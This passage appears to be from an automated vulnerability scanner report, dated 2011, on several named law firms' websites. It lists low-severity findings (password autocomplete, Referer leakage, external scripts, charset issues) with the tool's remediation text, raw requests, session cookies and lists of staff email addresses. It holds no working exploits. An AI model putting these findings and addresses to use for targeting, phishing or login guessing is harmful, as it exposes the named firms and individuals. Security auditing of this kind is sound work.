HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 16:55:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=18273037;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/ Set-Cookie: CFTOKEN=87095538;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The form contains the following password field with autocomplete enabled:
aPassword
Request
GET /alumni/Index.cfm HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: ALSITETOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/ Set-Cookie: ALUSERTOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//Dtd Xhtml 1.0 Strict//EN" "http://w ...[SNIP]... <td align="left" valign="top"> <form method="post" action="alumni_authenticate.cfm" id="loginFrm">
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
<title>Skadden - SEC Enforcement and Compliance</title>
<link href="scripts/skadden_mini.css" rel="styl ...[SNIP]... <td><a href="http://www.sec.gov/news/press/2010/2010-224.htm" target="_blank">SEC Charges Steven Rattner in Pay-to-Play Scheme Involving New York State Pension Fund</a> ...[SNIP]... <td><a href="http://www.sec.gov/news/press/2010/2010-225.htm" target="_blank">SEC Charges Former Madoff Employees with Fraud</a> ...[SNIP]... <td><a href="http://www.sec.gov/news/press/2010/2010-223.htm" target="_blank">SEC Charges New York Firms and Chief Compliance Officer for Inadequate Procedures to Protect Nonpublic Information</a> ...[SNIP]... <td><a href="http://www.sec.gov/news/press/2010/2010-220.htm" target="_blank">SEC Brings Additional Charges in Its Ongoing Investigations Into Two Insider Trading Rings</a> ...[SNIP]... <td><a href="http://www.finra.org/Newsroom/NewsReleases/2010/P122416" target="_blank">FINRA Fines Goldman Sachs $650,000 for Failing to Disclose Wells Notices</a> ...[SNIP]... <td><a href="http://www.sec.gov/news/press/2010/2010-214.htm" target="_blank">SEC Charges Seven Oil Services and Freight Forwarding Companies for Widespread Bribery of Customs Officials</a> ...[SNIP]...
GET /events.cfm?id=670&action=view HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html> <head>
<title>Arnold & Porter LLP - Natural Resource Damages: The Ground, Groundwater an ...[SNIP]... <p> <a href="http://www.lawseminars.com/detail.php?SeminarCode=11NRDFL" target="_blank">View Event Website</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.itunes.com/podcast?id=378831191
Request
GET /multimedia.cfm?action=view&id=674&t=event HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:26:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html> <head>
<title>Arnold & Porter LLP - WEBCAST: Implications of the Dodd-Frank Act for Non- ...[SNIP]... <div class="formrow"> <a href="http://www.itunes.com/podcast?id=378831191"><img src="http://www.arnoldporter.com//images/iTunesButton.jpg" width="77" align="bottom" height="23" border="0" alt="Listen in iTunes" /> ...[SNIP]...
GET /publications.cfm?id=2795&action=view HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html> <head>
<title>Arnold & Porter LLP - Trade mark owner can object to resale of 'perfume te ...[SNIP]... <p> <a href="http://jeclap.oxfordjournals.org/content/early/2010/10/21/jeclap.lpq062.full.pdf?ijkey=susEWMn9zEmLtCQ&keytype=ref" target="_blank">View Publication (URL)</a> ...[SNIP]...
GET /showoffice.aspx?Show=542 HTTP/1.1 Host: www.ebglaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Pragma: no-cache Set-Cookie: ASP.NET_SessionId=uhd35155lvi11l45rc200ezs; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 63652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head pro ...[SNIP]... </script>
<a href="http://www.litigationtrends.com"> <img src="/img/banners/ribbon/Ribbon.jpg" alt="" height="45" width="750" border="0" /> ...[SNIP]... </strong> an independent news organization that focuses on the inner workings of the U.S. Department of Justice, the Attorney General Office, U.S. Attorney news and <a href="http://www.mainjustice.com/justanti-corruption-a-new-site-from-main-justice/">white-collar crime, corruption and compliance law</a> ...[SNIP]... <td align="center" bordercolor="#DDD1C3">
The response contains the following link to another domain:
http://www.google-analytics.com/urchin.js
Request
GET /2011insights.cfm?contentID=52 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: BACKLINK=%2CcontentID%3D52;expires=Fri, 11-Jan-2041 15:14:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//E ...[SNIP]... </script>
The response contains the following link to another domain:
http://www.google-analytics.com/urchin.js
Request
GET /alumni/Index.cfm?contentID=7 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: ALSITETOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/ Set-Cookie: ALUSERTOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/ Set-Cookie: BACKLINK=%2CcontentID%3D7;expires=Fri, 11-Jan-2041 15:14:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//Dtd Xhtml 1.0 Strict//EN" "http://w ...[SNIP]... <!-- end border table -->
The response contains the following link to another domain:
http://www.google-analytics.com/urchin.js
Request
GET /index.cfm?contentID=42&itemID=1478 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: BACKLINK=%2CcontentID%3D42%26itemID%3D1478;expires=Fri, 11-Jan-2041 15:14:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
GET /showoffice.aspx?Show=542 HTTP/1.1 Host: www.ebglaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Pragma: no-cache Set-Cookie: ASP.NET_SessionId=uhd35155lvi11l45rc200ezs; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 63652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head pro ...[SNIP]... </script>
The response dynamically includes the following script from another domain:
http://www.google-analytics.com/urchin.js
Request
GET /2011insights.cfm HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//E ...[SNIP]... </script>
The response dynamically includes the following script from another domain:
http://www.google-analytics.com/urchin.js
Request
GET /alumni/Index.cfm HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: ALSITETOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/ Set-Cookie: ALUSERTOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//Dtd Xhtml 1.0 Strict//EN" "http://w ...[SNIP]... <!-- end border table -->
The response dynamically includes the following script from another domain:
http://www.google-analytics.com/urchin.js
Request
GET /index.cfm?contentID=42&itemID=1478 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: BACKLINK=%2CcontentID%3D42%26itemID%3D1478;expires=Fri, 11-Jan-2041 15:14:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
The response dynamically includes the following script from another domain:
http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /index.cfm HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The response dynamically includes the following script from another domain:
http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /x22 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The following email addresses were disclosed in the response:
amy.sabrin@skadden.com
greg.luce@skadden.com
jen.spaziano@skadden.com
mitchell.ettinger@skadden.com
Request
GET /fca/ HTTP/1.1 Host: skaddenpractices.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following email addresses were disclosed in the response:
brian.mccarthy@skadden.com
greg.luce@skadden.com
mark.cheffo@skadden.com
matthew.kipp@skadden.com
michael.loucks@skadden.com
Request
GET /hc/ HTTP/1.1 Host: skaddenpractices.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following email address was disclosed in the response:
Marsha.Tucker@aporter.com
Request
GET /about_the_firm_pro_bono_our_commitment.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The following email address was disclosed in the response:
events@aporter.com
Request
GET /events.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The following email addresses were disclosed in the response:
Stephen.DiGennaro@aporter.com
mailings.administrator@aporter.com
Request
GET /globals_privacy_policy.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.cov.com/zh-CN/offices/office.aspx?office=64">here</a>.</h2> </body></html>
<!DOCTYPE HTML PUBLIC "-/ ...[SNIP]... </div>eeliasoph@cov.com
/* Copyright (c) 2006 Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net) * Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php) * and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses. * Thanks to: ...[SNIP]...
The following email address was disclosed in the response:
rreif@ebglaw.com
Request
GET /showoffice.aspx?Show=542 HTTP/1.1 Host: www.ebglaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Pragma: no-cache Set-Cookie: ASP.NET_SessionId=uhd35155lvi11l45rc200ezs; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 63652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head pro ...[SNIP]... <a href="mailto:rreif@ebglaw.com">rreif@ebglaw.com</a> ...[SNIP]...
/* Prototype JavaScript framework, version 1.5.0_rc1 * (c) 2005 Sam Stephenson <sam@conio.net> * * Prototype is freely distributable under the terms of an MIT-style license. * For details, see ...[SNIP]...
The following email address was disclosed in the response:
smcdonald@cov.com
Request
GET / HTTP/1.1 Host: www.political.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 16:55:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=18273037;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/ Set-Cookie: CFTOKEN=87095538;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html> <head> <title>Covington Political Broadcasting Law</title ...[SNIP]... <a href="mailto:smcdonald@cov.com">smcdonald@cov.com</a> ...[SNIP]...
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
GET /index.cfm?fuseaction=local.detail&site_id=299&link_name=Map and Directions HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 400 Bad Request Content-Type: text/html Date: Wed, 19 Jan 2011 15:48:37 GMT Connection: close Content-Length: 20
<h1>Bad Request</h1>
13. HTML uses unrecognised charsetpreviousnext There are 2 instances of this issue:
Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:
GB2312
utf-8
Request
GET /404.aspx HTTP/1.1 Host: www.ebglaw.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=mkavhri4srbzl255z4ebp2i3; __utmz=72265415.1295452418.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27; __utma=72265415.606180877.1295452418.1295452418.1295452418.1; __utmc=72265415; __utmb=72265415.1.10.1295452418
Response
HTTP/1.1 404 Not Found Date: Wed, 19 Jan 2011 15:53:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Pragma: no-cache Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 56291
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head pro ...[SNIP]... <meta name="google-site-verification" content="Vi9097zu70eGOFMSymjHqe9XRFgd-tFxmXE5JASBeHM" /> <meta http-equiv="Content-Type" content="text/html; charset=GB2312" />
The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:
GB2312
utf-8
Request
GET /showoffice.aspx?Show=542 HTTP/1.1 Host: www.ebglaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Pragma: no-cache Set-Cookie: ASP.NET_SessionId=uhd35155lvi11l45rc200ezs; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 63652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head pro ...[SNIP]... <meta name="google-site-verification" content="Vi9097zu70eGOFMSymjHqe9XRFgd-tFxmXE5JASBeHM" /> <meta http-equiv="Content-Type" content="text/html; charset=GB2312" />
<title> ...[SNIP]...
14. Content type incorrectly statedprevious There are 2 instances of this issue:
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain XML.
Request
